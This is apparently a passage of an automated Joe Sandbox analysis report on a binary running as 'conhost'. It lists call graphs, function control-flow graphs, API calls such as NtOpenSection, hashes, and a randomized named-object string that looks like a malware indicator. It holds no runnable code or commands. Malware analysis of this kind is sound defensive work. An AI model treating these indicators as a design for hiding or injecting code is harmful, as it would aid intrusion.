wcslen 2369 14000153f 2 API calls 2368->2369 2369->2374 2370 14000515d wcslen 2373 14000153f 2 API calls 2370->2373 2371 140004ef9 wcslen 2372 14000157b 2 API calls 2371->2372 2372->2374 2373->2374 2374->2360 2374->2363 2374->2364 2374->2368 2374->2370 2374->2371 2375 140004f7c memset 2374->2375 2376 140005a51 wcscpy wcscat wcslen 2374->2376 2377 140005f8d memcpy 2374->2377 2379 140004fe6 wcslen 2374->2379 2383 14000504e _wcsnicmp 2374->2383 2384 140005b9c 2374->2384 2385 1400027d0 11 API calls 2374->2385 2386 140005c47 wcslen 2374->2386 2388 1400057f5 memset 2374->2388 2389 1400059f0 memset 2374->2389 2390 14000585b memset 2374->2390 2391 1400058b5 wcscpy wcscat wcslen 2374->2391 2776 1400014d6 2374->2776 2821 140001521 2374->2821 2919 140001431 2374->2919 2375->2374 2378 140001422 2 API calls 2376->2378 2377->2374 2378->2374 2380 1400015a8 2 API calls 2379->2380 2380->2374 2383->2374 2384->2265 2385->2374 2387 1400015a8 2 API calls 2386->2387 2387->2374 2388->2374 2388->2389 2389->2374 2390->2374 2850 140001422 2391->2850 2394 140001394 2 API calls 2393->2394 2395 14000154e 2394->2395 2396 140001394 2 API calls 2395->2396 2397 14000155d 2396->2397 2398 140001394 2 API calls 2397->2398 2399 14000156c 2398->2399 2400 140001394 2 API calls 2399->2400 2401 14000157b 2400->2401 2402 140001394 2 API calls 2401->2402 2403 14000158a 2402->2403 2404 140001394 2 API calls 2403->2404 2405 140001599 2404->2405 2406 140001394 2 API calls 2405->2406 2407 1400015a8 2406->2407 2408 140001394 2 API calls 2407->2408 2409 1400015b7 2408->2409 2410 140001394 2 API calls 2409->2410 2411 1400015c6 2410->2411 2412 140001394 2 API calls 2411->2412 2413 1400015d5 2412->2413 2414 140001394 2 API calls 2413->2414 2415 1400015e4 2414->2415 2416 140001394 2 API calls 2415->2416 2417 1400015f3 2416->2417 2417->2288 2418 140001503 2417->2418 2419 140001394 2 API calls 2418->2419 2420 14000150d 2419->2420 2421 140001394 2 API calls 2420->2421 2422 140001512 2421->2422 2423 140001394 2 API calls 2422->2423 2424 140001521 2423->2424 2425 140001394 2 API calls 2424->2425 2426 140001530 2425->2426 2427 140001394 2 API calls 2426->2427 2428 14000153f 2427->2428 2429 140001394 2 API calls 2428->2429 2430 14000154e 2429->2430 2431 140001394 2 API calls 2430->2431 2432 14000155d 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000156c 2433->2434 2435 140001394 2 API calls 2434->2435 2436 14000157b 2435->2436 2437 140001394 2 API calls 2436->2437 2438 14000158a 2437->2438 2439 140001394 2 API calls 2438->2439 2440 140001599 2439->2440 2441 140001394 2 API calls 2440->2441 2442 1400015a8 2441->2442 2443 140001394 2 API calls 2442->2443 2444 1400015b7 2443->2444 2445 140001394 2 API calls 2444->2445 2446 1400015c6 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015d5 2447->2448 2449 140001394 2 API calls 2448->2449 2450 1400015e4 2449->2450 2451 140001394 2 API calls 2450->2451 2452 1400015f3 2451->2452 2452->2291 2453 14000156c 2452->2453 2454 140001394 2 API calls 2453->2454 2455 14000157b 2454->2455 2456 140001394 2 API calls 2455->2456 2457 14000158a 2456->2457 2458 140001394 2 API calls 2457->2458 2459 140001599 2458->2459 2460 140001394 2 API calls 2459->2460 2461 1400015a8 2460->2461 2462 140001394 2 API calls 2461->2462 2463 1400015b7 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015c6 2464->2465 2466 140001394 2 API calls 2465->2466 2467 1400015d5 2466->2467 2468 140001394 2 API calls 2467->2468 2469 1400015e4 2468->2469 2470 140001394 2 API calls 2469->2470 2471 1400015f3 2470->2471 2471->2291 2472 14000145e 2471->2472 2473 140001394 2 API calls 2472->2473 2474 14000146d 2473->2474 2475 140001394 2 API calls 2474->2475 2476 14000147c 2475->2476 2477 140001394 2 API calls 2476->2477 2478 14000148b 2477->2478 2479 140001394 2 API calls 2478->2479 2480 14000149a 2479->2480 2481 140001394 2 API calls 2480->2481 2482 1400014a9 2481->2482 2483 140001394 2 API calls 2482->2483 2484 1400014b8 2483->2484 2485 140001394 2 API calls 2484->2485 2486 1400014c7 2485->2486 2487 140001394 2 API calls 2486->2487 2488 1400014d6 2487->2488 2489 1400014e5 2488->2489 2490 140001394 2 API calls 2488->2490 2491 140001394 2 API calls 2489->2491 2490->2489 2492 1400014ef 2491->2492 2493 1400014f4 2492->2493 2494 140001394 2 API calls 2492->2494 2495 140001394 2 API calls 2493->2495 2494->2493 2496 1400014fe 2495->2496 2497 140001503 2496->2497 2498 140001394 2 API calls 2496->2498 2499 140001394 2 API calls 2497->2499 2498->2497 2500 14000150d 2499->2500 2501 140001394 2 API calls 2500->2501 2502 140001512 2501->2502 2503 140001394 2 API calls 2502->2503 2504 140001521 2503->2504 2505 140001394 2 API calls 2504->2505 2506 140001530 2505->2506 2507 140001394 2 API calls 2506->2507 2508 14000153f 2507->2508 2509 140001394 2 API calls 2508->2509 2510 14000154e 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000155d 2511->2512 2513 140001394 2 API calls 2512->2513 2514 14000156c 2513->2514 2515 140001394 2 API calls 2514->2515 2516 14000157b 2515->2516 2517 140001394 2 API calls 2516->2517 2518 14000158a 2517->2518 2519 140001394 2 API calls 2518->2519 2520 140001599 2519->2520 2521 140001394 2 API calls 2520->2521 2522 1400015a8 2521->2522 2523 140001394 2 API calls 2522->2523 2524 1400015b7 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015c6 2525->2526 2527 140001394 2 API calls 2526->2527 2528 1400015d5 2527->2528 2529 140001394 2 API calls 2528->2529 2530 1400015e4 2529->2530 2531 140001394 2 API calls 2530->2531 2532 1400015f3 2531->2532 2532->2291 2534 140001394 2 API calls 2533->2534 2535 14000158a 2534->2535 2536 140001394 2 API calls 2535->2536 2537 140001599 2536->2537 2538 140001394 2 API calls 2537->2538 2539 1400015a8 2538->2539 2540 140001394 2 API calls 2539->2540 2541 1400015b7 2540->2541 2542 140001394 2 API calls 2541->2542 2543 1400015c6 2542->2543 2544 140001394 2 API calls 2543->2544 2545 1400015d5 2544->2545 2546 140001394 2 API calls 2545->2546 2547 1400015e4 2546->2547 2548 140001394 2 API calls 2547->2548 2549 1400015f3 2548->2549 2549->2366 2551 140001394 2 API calls 2550->2551 2552 1400015a8 2551->2552 2553 140001394 2 API calls 2552->2553 2554 1400015b7 2553->2554 2555 140001394 2 API calls 2554->2555 2556 1400015c6 2555->2556 2557 140001394 2 API calls 2556->2557 2558 1400015d5 2557->2558 2559 140001394 2 API calls 2558->2559 2560 1400015e4 2559->2560 2561 140001394 2 API calls 2560->2561 2562 1400015f3 2561->2562 2562->2366 2564 140001394 2 API calls 2563->2564 2565 1400015b7 2564->2565 2566 140001394 2 API calls 2565->2566 2567 1400015c6 2566->2567 2568 140001394 2 API calls 2567->2568 2569 1400015d5 2568->2569 2570 140001394 2 API calls 2569->2570 2571 1400015e4 2570->2571 2572 140001394 2 API calls 2571->2572 2573 1400015f3 2572->2573 2573->2366 2575 140001394 2 API calls 2574->2575 2576 14000147c 2575->2576 2577 140001394 2 API calls 2576->2577 2578 14000148b 2577->2578 2579 140001394 2 API calls 2578->2579 2580 14000149a 2579->2580 2581 140001394 2 API calls 2580->2581 2582 1400014a9 2581->2582 2583 140001394 2 API calls 2582->2583 2584 1400014b8 2583->2584 2585 140001394 2 API calls 2584->2585 2586 1400014c7 2585->2586 2587 140001394 2 API calls 2586->2587 2588 1400014d6 2587->2588 2589 1400014e5 2588->2589 2590 140001394 2 API calls 2588->2590 2591 140001394 2 API calls 2589->2591 2590->2589 2592 1400014ef 2591->2592 2593 1400014f4 2592->2593 2594 140001394 2 API calls 2592->2594 2595 140001394 2 API calls 2593->2595 2594->2593 2596 1400014fe 2595->2596 2597 140001503 2596->2597 2598 140001394 2 API calls 2596->2598 2599 140001394 2 API calls 2597->2599 2598->2597 2600 14000150d 2599->2600 2601 140001394 2 API calls 2600->2601 2602 140001512 2601->2602 2603 140001394 2 API calls 2602->2603 2604 140001521 2603->2604 2605 140001394 2 API calls 2604->2605 2606 140001530 2605->2606 2607 140001394 2 API calls 2606->2607 2608 14000153f 2607->2608 2609 140001394 2 API calls 2608->2609 2610 14000154e 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000155d 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000156c 2613->2614 2615 140001394 2 API calls 2614->2615 2616 14000157b 2615->2616 2617 140001394 2 API calls 2616->2617 2618 14000158a 2617->2618 2619 140001394 2 API calls 2618->2619 2620 140001599 2619->2620 2621 140001394 2 API calls 2620->2621 2622 1400015a8 2621->2622 2623 140001394 2 API calls 2622->2623 2624 1400015b7 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015c6 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015d5 2627->2628 2629 140001394 2 API calls 2628->2629 2630 1400015e4 2629->2630 2631 140001394 2 API calls 2630->2631 2632 1400015f3 2631->2632 2632->2333 2633 140001530 2632->2633 2634 140001394 2 API calls 2633->2634 2635 14000153f 2634->2635 2636 140001394 2 API calls 2635->2636 2637 14000154e 2636->2637 2638 140001394 2 API calls 2637->2638 2639 14000155d 2638->2639 2640 140001394 2 API calls 2639->2640 2641 14000156c 2640->2641 2642 140001394 2 API calls 2641->2642 2643 14000157b 2642->2643 2644 140001394 2 API calls 2643->2644 2645 14000158a 2644->2645 2646 140001394 2 API calls 2645->2646 2647 140001599 2646->2647 2648 140001394 2 API calls 2647->2648 2649 1400015a8 2648->2649 2650 140001394 2 API calls 2649->2650 2651 1400015b7 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015c6 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015d5 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015e4 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400015f3 2658->2659 2659->2337 2659->2338 2661 140001394 2 API calls 2660->2661 2662 1400014b8 2661->2662 2663 140001394 2 API calls 2662->2663 2664 1400014c7 2663->2664 2665 140001394 2 API calls 2664->2665 2666 1400014d6 2665->2666 2667 1400014e5 2666->2667 2668 140001394 2 API calls 2666->2668 2669 140001394 2 API calls 2667->2669 2668->2667 2670 1400014ef 2669->2670 2671 1400014f4 2670->2671 2672 140001394 2 API calls 2670->2672 2673 140001394 2 API calls 2671->2673 2672->2671 2674 1400014fe 2673->2674 2675 140001503 2674->2675 2676 140001394 2 API calls 2674->2676 2677 140001394 2 API calls 2675->2677 2676->2675 2678 14000150d 2677->2678 2679 140001394 2 API calls 2678->2679 2680 140001512 2679->2680 2681 140001394 2 API calls 2680->2681 2682 140001521 2681->2682 2683 140001394 2 API calls 2682->2683 2684 140001530 2683->2684 2685 140001394 2 API calls 2684->2685 2686 14000153f 2685->2686 2687 140001394 2 API calls 2686->2687 2688 14000154e 2687->2688 2689 140001394 2 API calls 2688->2689 2690 14000155d 2689->2690 2691 140001394 2 API calls 2690->2691 2692 14000156c 2691->2692 2693 140001394 2 API calls 2692->2693 2694 14000157b 2693->2694 2695 140001394 2 API calls 2694->2695 2696 14000158a 2695->2696 2697 140001394 2 API calls 2696->2697 2698 140001599 2697->2698 2699 140001394 2 API calls 2698->2699 2700 1400015a8 2699->2700 2701 140001394 2 API calls 2700->2701 2702 1400015b7 2701->2702 2703 140001394 2 API calls 2702->2703 2704 1400015c6 2703->2704 2705 140001394 2 API calls 2704->2705 2706 1400015d5 2705->2706 2707 140001394 2 API calls 2706->2707 2708 1400015e4 2707->2708 2709 140001394 2 API calls 2708->2709 2710 1400015f3 2709->2710 2710->2347 2711 140001440 2710->2711 2712 140001394 2 API calls 2711->2712 2713 14000144f 2712->2713 2714 140001394 2 API calls 2713->2714 2715 14000145e 2714->2715 2716 140001394 2 API calls 2715->2716 2717 14000146d 2716->2717 2718 140001394 2 API calls 2717->2718 2719 14000147c 2718->2719 2720 140001394 2 API calls 2719->2720 2721 14000148b 2720->2721 2722 140001394 2 API calls 2721->2722 2723 14000149a 2722->2723 2724 140001394 2 API calls 2723->2724 2725 1400014a9 2724->2725 2726 140001394 2 API calls 2725->2726 2727 1400014b8 2726->2727 2728 140001394 2 API calls 2727->2728 2729 1400014c7 2728->2729 2730 140001394 2 API calls 2729->2730 2731 1400014d6 2730->2731 2732 1400014e5 2731->2732 2733 140001394 2 API calls 2731->2733 2734 140001394 2 API calls 2732->2734 2733->2732 2735 1400014ef 2734->2735 2736 1400014f4 2735->2736 2737 140001394 2 API calls 2735->2737 2738 140001394 2 API calls 2736->2738 2737->2736 2739 1400014fe 2738->2739 2740 140001503 2739->2740 2741 140001394 2 API calls 2739->2741 2742 140001394 2 API calls 2740->2742 2741->2740 2743 14000150d 2742->2743 2744 140001394 2 API calls 2743->2744 2745 140001512 2744->2745 2746 140001394 2 API calls 2745->2746 2747 140001521 2746->2747 2748 140001394 2 API calls 2747->2748 2749 140001530 2748->2749 2750 140001394 2 API calls 2749->2750 2751 14000153f 2750->2751 2752 140001394 2 API calls 2751->2752 2753 14000154e 2752->2753 2754 140001394 2 API calls 2753->2754 2755 14000155d 2754->2755 2756 140001394 2 API calls 2755->2756 2757 14000156c 2756->2757 2758 140001394 2 API calls 2757->2758 2759 14000157b 2758->2759 2760 140001394 2 API calls 2759->2760 2761 14000158a 2760->2761 2762 140001394 2 API calls 2761->2762 2763 140001599 2762->2763 2764 140001394 2 API calls 2763->2764 2765 1400015a8 2764->2765 2766 140001394 2 API calls 2765->2766 2767 1400015b7 2766->2767 2768 140001394 2 API calls 2767->2768 2769 1400015c6 2768->2769 2770 140001394 2 API calls 2769->2770 2771 1400015d5 2770->2771 2772 140001394 2 API calls 2771->2772 2773 1400015e4 2772->2773 2774 140001394 2 API calls 2773->2774 2775 1400015f3 2774->2775 2775->2347 2775->2356 2777 1400014e5 2776->2777 2778 140001394 2 API calls 2776->2778 2779 140001394 2 API calls 2777->2779 2778->2777 2780 1400014ef 2779->2780 2781 1400014f4 2780->2781 2782 140001394 2 API calls 2780->2782 2783 140001394 2 API calls 2781->2783 2782->2781 2784 1400014fe 2783->2784 2785 140001503 2784->2785 2786 140001394 2 API calls 2784->2786 2787 140001394 2 API calls 2785->2787 2786->2785 2788 14000150d 2787->2788 2789 140001394 2 API calls 2788->2789 2790 140001512 2789->2790 2791 140001394 2 API calls 2790->2791 2792 140001521 2791->2792 2793 140001394 2 API calls 2792->2793 2794 140001530 2793->2794 2795 140001394 2 API calls 2794->2795 2796 14000153f 2795->2796 2797 140001394 2 API calls 2796->2797 2798 14000154e 2797->2798 2799 140001394 2 API calls 2798->2799 2800 14000155d 2799->2800 2801 140001394 2 API calls 2800->2801 2802 14000156c 2801->2802 2803 140001394 2 API calls 2802->2803 2804 14000157b 2803->2804 2805 140001394 2 API calls 2804->2805 2806 14000158a 2805->2806 2807 140001394 2 API calls 2806->2807 2808 140001599 2807->2808 2809 140001394 2 API calls 2808->2809 2810 1400015a8 2809->2810 2811 140001394 2 API calls 2810->2811 2812 1400015b7 2811->2812 2813 140001394 2 API calls 2812->2813 2814 1400015c6 2813->2814 2815 140001394 2 API calls 2814->2815 2816 1400015d5 2815->2816 2817 140001394 2 API calls 2816->2817 2818 1400015e4 2817->2818 2819 140001394 2 API calls 2818->2819 2820 1400015f3 2819->2820 2820->2374 2822 140001394 2 API calls 2821->2822 2823 140001530 2822->2823 2824 140001394 2 API calls 2823->2824 2825 14000153f 2824->2825 2826 140001394 2 API calls 2825->2826 2827 14000154e 2826->2827 2828 140001394 2 API calls 2827->2828 2829 14000155d 2828->2829 2830 140001394 2 API calls 2829->2830 2831 14000156c 2830->2831 2832 140001394 2 API calls 2831->2832 2833 14000157b 2832->2833 2834 140001394 2 API calls 2833->2834 2835 14000158a 2834->2835 2836 140001394 2 API calls 2835->2836 2837 140001599 2836->2837 2838 140001394 2 API calls 2837->2838 2839 1400015a8 2838->2839 2840 140001394 2 API calls 2839->2840 2841 1400015b7 2840->2841 2842 140001394 2 API calls 2841->2842 2843 1400015c6 2842->2843 2844 140001394 2 API calls 2843->2844 2845 1400015d5 2844->2845 2846 140001394 2 API calls 2845->2846 2847 1400015e4 2846->2847 2848 140001394 2 API calls 2847->2848 2849 1400015f3 2848->2849 2849->2374 2851 140001394 2 API calls 2850->2851 2852 140001431 2851->2852 2853 140001394 2 API calls 2852->2853 2854 140001440 2853->2854 2855 140001394 2 API calls 2854->2855 2856 14000144f 2855->2856 2857 140001394 2 API calls 2856->2857 2858 14000145e 2857->2858 2859 140001394 2 API calls 2858->2859 2860 14000146d 2859->2860 2861 140001394 2 API calls 2860->2861 2862 14000147c 2861->2862 2863 140001394 2 API calls 2862->2863 2864 14000148b 2863->2864 2865 140001394 2 API calls 2864->2865 2866 14000149a 2865->2866 2867 140001394 2 API calls 2866->2867 2868 1400014a9 2867->2868 2869 140001394 2 API calls 2868->2869 2870 1400014b8 2869->2870 2871 140001394 2 API calls 2870->2871 2872 1400014c7 2871->2872 2873 140001394 2 API calls 2872->2873 2874 1400014d6 2873->2874 2875 1400014e5 2874->2875 2876 140001394 2 API calls 2874->2876 2877 140001394 2 API calls 2875->2877 2876->2875 2878 1400014ef 2877->2878 2879 1400014f4 2878->2879 2880 140001394 2 API calls 2878->2880 2881 140001394 2 API calls 2879->2881 2880->2879 2882 1400014fe 2881->2882 2883 140001503 2882->2883 2884 140001394 2 API calls 2882->2884 2885 140001394 2 API calls 2883->2885 2884->2883 2886 14000150d 2885->2886 2887 140001394 2 API calls 2886->2887 2888 140001512 2887->2888 2889 140001394 2 API calls 2888->2889 2890 140001521 2889->2890 2891 140001394 2 API calls 2890->2891 2892 140001530 2891->2892 2893 140001394 2 API calls 2892->2893 2894 14000153f 2893->2894 2895 140001394 2 API calls 2894->2895 2896 14000154e 2895->2896 2897 140001394 2 API calls 2896->2897 2898 14000155d 2897->2898 2899 140001394 2 API calls 2898->2899 2900 14000156c 2899->2900 2901 140001394 2 API calls 2900->2901 2902 14000157b 2901->2902 2903 140001394 2 API calls 2902->2903 2904 14000158a 2903->2904 2905 140001394 2 API calls 2904->2905 2906 140001599 2905->2906 2907 140001394 2 API calls 2906->2907 2908 1400015a8 2907->2908 2909 140001394 2 API calls 2908->2909 2910 1400015b7 2909->2910 2911 140001394 2 API calls 2910->2911 2912 1400015c6 2911->2912 2913 140001394 2 API calls 2912->2913 2914 1400015d5 2913->2914 2915 140001394 2 API calls 2914->2915 2916 1400015e4 2915->2916 2917 140001394 2 API calls 2916->2917 2918 1400015f3 2917->2918 2918->2374 2920 140001394 2 API calls 2919->2920 2921 140001440 2920->2921 2922 140001394 2 API calls 2921->2922 2923 14000144f 2922->2923 2924 140001394 2 API calls 2923->2924 2925 14000145e 2924->2925 2926 140001394 2 API calls 2925->2926 2927 14000146d 2926->2927 2928 140001394 2 API calls 2927->2928 2929 14000147c 2928->2929 2930 140001394 2 API calls 2929->2930 2931 14000148b 2930->2931 2932 140001394 2 API calls 2931->2932 2933 14000149a 2932->2933 2934 140001394 2 API calls 2933->2934 2935 1400014a9 2934->2935 2936 140001394 2 API calls 2935->2936 2937 1400014b8 2936->2937 2938 140001394 2 API calls 2937->2938 2939 1400014c7 2938->2939 2940 140001394 2 API calls 2939->2940 2941 1400014d6 2940->2941 2942 1400014e5 2941->2942 2943 140001394 2 API calls 2941->2943 2944 140001394 2 API calls 2942->2944 2943->2942 2945 1400014ef 2944->2945 2946 1400014f4 2945->2946 2947 140001394 2 API calls 2945->2947 2948 140001394 2 API calls 2946->2948 2947->2946 2949 1400014fe 2948->2949 2950 140001503 2949->2950 2951 140001394 2 API calls 2949->2951 2952 140001394 2 API calls 2950->2952 2951->2950 2953 14000150d 2952->2953 2954 140001394 2 API calls 2953->2954 2955 140001512 2954->2955 2956 140001394 2 API calls 2955->2956 2957 140001521 2956->2957 2958 140001394 2 API calls 2957->2958 2959 140001530 2958->2959 2960 140001394 2 API calls 2959->2960 2961 14000153f 2960->2961 2962 140001394 2 API calls 2961->2962 2963 14000154e 2962->2963 2964 140001394 2 API calls 2963->2964 2965 14000155d 2964->2965 2966 140001394 2 API calls 2965->2966 2967 14000156c 2966->2967 2968 140001394 2 API calls 2967->2968 2969 14000157b 2968->2969 2970 140001394 2 API calls 2969->2970 2971 14000158a 2970->2971 2972 140001394 2 API calls 2971->2972 2973 140001599 2972->2973 2974 140001394 2 API calls 2973->2974 2975 1400015a8 2974->2975 2976 140001394 2 API calls 2975->2976 2977 1400015b7 2976->2977 2978 140001394 2 API calls 2977->2978 2979 1400015c6 2978->2979 2980 140001394 2 API calls 2979->2980 2981 1400015d5 2980->2981 2982 140001394 2 API calls 2981->2982 2983 1400015e4 2982->2983 2984 140001394 2 API calls 2983->2984 2985 1400015f3 2984->2985 2985->2374

                                                                                                    Callgraph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    • Opacity -> Relevance
                                                                                                    • Disassembly available
                                                                                                    callgraph 0 Function_00000001400026E1 1 Function_00000001400031E1 2 Function_00000001400062E1 3 Function_00000001400064E1 4 Function_0000000140001AE4 39 Function_0000000140001D40 4->39 81 Function_0000000140001BA0 4->81 5 Function_00000001400014E5 76 Function_0000000140001394 5->76 6 Function_00000001400010F0 7 Function_0000000140002FF0 62 Function_0000000140001370 7->62 8 Function_00000001400068F0 32 Function_0000000140006630 8->32 9 Function_00000001400063F1 10 Function_00000001400014F4 10->76 11 Function_0000000140001800 71 Function_0000000140002290 11->71 12 Function_0000000140002500 13 Function_0000000140003200 14 Function_0000000140001000 15 Function_0000000140001E00 14->15 45 Function_0000000140001750 14->45 88 Function_0000000140001FB0 14->88 95 Function_0000000140001FC0 14->95 16 Function_0000000140006301 17 Function_0000000140001503 17->76 18 Function_0000000140001404 18->76 19 Function_0000000140002104 20 Function_0000000140001E10 21 Function_0000000140006610 22 Function_0000000140006411 23 Function_0000000140001512 23->76 24 Function_0000000140006420 25 Function_0000000140003220 26 Function_0000000140002320 27 Function_0000000140002420 28 Function_0000000140001521 28->76 29 Function_0000000140006321 30 Function_0000000140001422 30->76 31 Function_0000000140001530 31->76 33 Function_0000000140001431 33->76 34 Function_000000014000153F 34->76 35 Function_0000000140001440 35->76 36 Function_0000000140001140 52 Function_0000000140001160 36->52 37 Function_0000000140003240 37->7 37->17 37->28 37->30 37->31 37->32 37->33 37->34 37->35 50 Function_000000014000145E 37->50 53 Function_0000000140002660 37->53 58 Function_000000014000156C 37->58 59 Function_000000014000146D 37->59 37->62 67 Function_000000014000157B 37->67 78 Function_0000000140001599 37->78 85 Function_00000001400015A8 37->85 86 Function_00000001400014A9 37->86 96 Function_00000001400016C0 37->96 101 Function_00000001400027D0 37->101 106 Function_00000001400014D6 37->106 38 Function_0000000140006640 38->32 39->71 40 Function_0000000140003141 41 Function_0000000140006341 42 Function_0000000140006441 43 Function_0000000140001F47 61 Function_0000000140001870 43->61 44 Function_0000000140002050 46 Function_0000000140001650 47 Function_0000000140002751 48 Function_0000000140006551 49 Function_000000014000155D 49->76 50->76 51 Function_0000000140001760 107 Function_00000001400020E0 51->107 52->37 52->52 52->61 68 Function_0000000140001880 52->68 70 Function_0000000140001F90 52->70 52->96 54 Function_0000000140002460 55 Function_0000000140003160 56 Function_0000000140006361 57 Function_0000000140001E65 57->61 58->76 59->76 60 Function_000000014000216F 63 Function_0000000140001A70 63->39 63->81 64 Function_0000000140002770 65 Function_0000000140006471 66 Function_0000000140006571 67->76 68->27 68->39 68->53 68->81 69 Function_0000000140003180 72 Function_0000000140002590 73 Function_0000000140002790 74 Function_0000000140002691 75 Function_0000000140006391 76->8 76->38 77 Function_0000000140002194 77->61 78->76 79 Function_000000014000219E 80 Function_0000000140001FA0 81->39 87 Function_00000001400023B0 81->87 100 Function_00000001400024D0 81->100 82 Function_00000001400027A0 83 Function_00000001400031A1 84 Function_00000001400064A1 85->76 86->76 89 Function_00000001400022B0 90 Function_00000001400026B0 91 Function_00000001400027B1 92 Function_00000001400063B1 93 Function_00000001400065B1 94 Function_0000000140001AB3 94->39 94->81 97 Function_0000000140001AC3 97->39 97->81 98 Function_00000001400014C7 98->76 99 Function_0000000140001FD0 101->5 101->10 101->17 101->23 101->32 101->49 101->50 101->53 101->62 101->86 101->98 102 Function_00000001400017D0 103 Function_00000001400026D0 104 Function_00000001400063D1 105 Function_0000000140001AD4 105->39 105->81 106->76 108 Function_00000001400017E0 108->107 109 Function_00000001400022E0

                                                                                                    Executed Functions

                                                                                                    Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • NtOpenSection.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000040.00000002.2596139121.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    • Associated: 00000040.00000002.2596088889.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596200164.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596242172.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596323916.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_64_2_140000000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: OpenSection
                                                                                                    • String ID:
                                                                                                    • API String ID: 1950954290-0
                                                                                                    • Opcode ID: a923caea3aedb3c196ce5840bc68ebf5f285de31d4ada5355376284b378bb800
                                                                                                    • Instruction ID: f52bb56a26aec6286b1ea6478ff1b17f0c1a3bfdae4c07577ac701bf94f018f1
                                                                                                    • Opcode Fuzzy Hash: a923caea3aedb3c196ce5840bc68ebf5f285de31d4ada5355376284b378bb800
                                                                                                    • Instruction Fuzzy Hash: B1F09DB2608B808AEA12DB62F85179A77A1F38C7C0F009929BBC853735DB38C190CB40

                                                                                                    Non-executed Functions

                                                                                                    Function 00000001400027D0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 376COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 385 1400027d0-14000282b call 140002660 memset 388 140002831-14000283b 385->388 389 1400028fe-14000294e call 14000155d 385->389 391 140002864-14000286a 388->391 394 140002a43-140002a6b call 1400014c7 389->394 395 140002954-140002963 389->395 391->389 393 140002870-140002877 391->393 396 140002879-140002882 393->396 397 140002840-140002842 393->397 412 140002a76-140002ab8 call 140001503 call 140006630 memset 394->412 413 140002a6d 394->413 398 140002fa7-140002fe4 call 140001370 395->398 399 140002969-140002978 395->399 402 140002884-14000289b 396->402 403 1400028e8-1400028eb 396->403 400 14000284a-14000285e 397->400 404 1400029d4-140002a3e wcsncmp call 1400014e5 399->404 405 14000297a-1400029cd 399->405 400->389 400->391 408 1400028e5 402->408 409 14000289d-1400028b2 402->409 403->400 404->394 405->404 408->403 414 1400028c0-1400028c7 409->414 421 140002f39-140002f74 call 140001370 412->421 422 140002abe-140002ac5 412->422 413->412 415 1400028c9-1400028e3 414->415 416 1400028f0-1400028f9 414->416 415->408 415->414 416->400 424 140002ac7-140002afc 421->424 429 140002f7a 421->429 423 140002b03-140002b33 wcscpy wcscat wcslen 422->423 422->424 427 140002b35-140002b66 wcslen 423->427 428 140002b68-140002b95 423->428 424->423 430 140002b98-140002baf wcslen 427->430 428->430 429->423 431 140002bb5-140002bc8 430->431 432 140002f7f-140002f9b call 140001370 430->432 434 140002be5-140002eeb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 431->434 435 140002bca-140002bde 431->435 432->398 453 140002eed-140002f0b call 140001512 434->453 454 140002f10-140002f38 call 14000145e 434->454 435->434 453->454
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000040.00000002.2596139121.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    • Associated: 00000040.00000002.2596088889.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596200164.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596242172.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596323916.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_64_2_140000000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                                                                    • String ID: 0$X$\BaseNamedObjects\qdpnprrzvlcxaaqg$`
                                                                                                    • API String ID: 780471329-975928381
                                                                                                    • Opcode ID: e0318adb0dbd4564b9f192ff8ace1adad8a0fb704a24824db8b439d87ab7a846
                                                                                                    • Instruction ID: 0ca124f9ffee38d92fc9e5ab9fb194d169faf43235d32241d109a9a9ba303ed6
                                                                                                    • Opcode Fuzzy Hash: e0318adb0dbd4564b9f192ff8ace1adad8a0fb704a24824db8b439d87ab7a846
                                                                                                    • Instruction Fuzzy Hash: 35125AB2618BC081E762CB26F8443EAB7A4F789794F414215EBA957BF5DF78C189C700
                                                                                                    Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                                                    Download Yara Rule

